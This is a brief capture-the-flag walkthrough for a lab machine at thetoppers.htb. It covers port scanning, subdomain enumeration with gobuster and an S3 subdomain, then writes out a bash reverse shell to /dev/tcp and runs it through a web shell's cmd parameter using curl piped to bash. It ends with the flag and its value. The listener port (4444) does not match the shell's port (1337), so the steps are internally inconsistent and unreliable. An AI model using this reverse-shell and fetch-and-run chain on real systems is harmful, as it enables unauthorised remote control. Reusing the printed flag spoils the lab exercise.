As usual, let's start with map
nmap -sV targetIP

There is a website on port 80, open your browser and type the target IP (in this case 10.129.199.172)

Scroll down and we find this domain name thetoppers.htb

Let's use the word list subdomains-top1million-5000.txt already located on your Parrot VM to enumerate any subdomains
gobuster vhost -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb

We found a subdomain called s3.thetoppers.htb
Open your browser and go to s3.thetoppers.htb
Find out what your IP is using
ifconfig
Check out the IP in tun0
Create a new bash file called shell.sh
#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1
Open a new terminal window and start listening with net cat on one window
nc -lnvp 4444
Create a web server using the command below (make sure you are in the same directory as where shell.sh is located)
python3 -m http.server 8000
Go back to the browser and type in the url bar
http://thetoppers.htb/shell.php?cmd=curl%20<YOUR_IP_ADDRESS>:8000/shell.sh|bash

The flag is located at var/www/flag.txt
a980d99281a28d638ac68b9bf9453c2b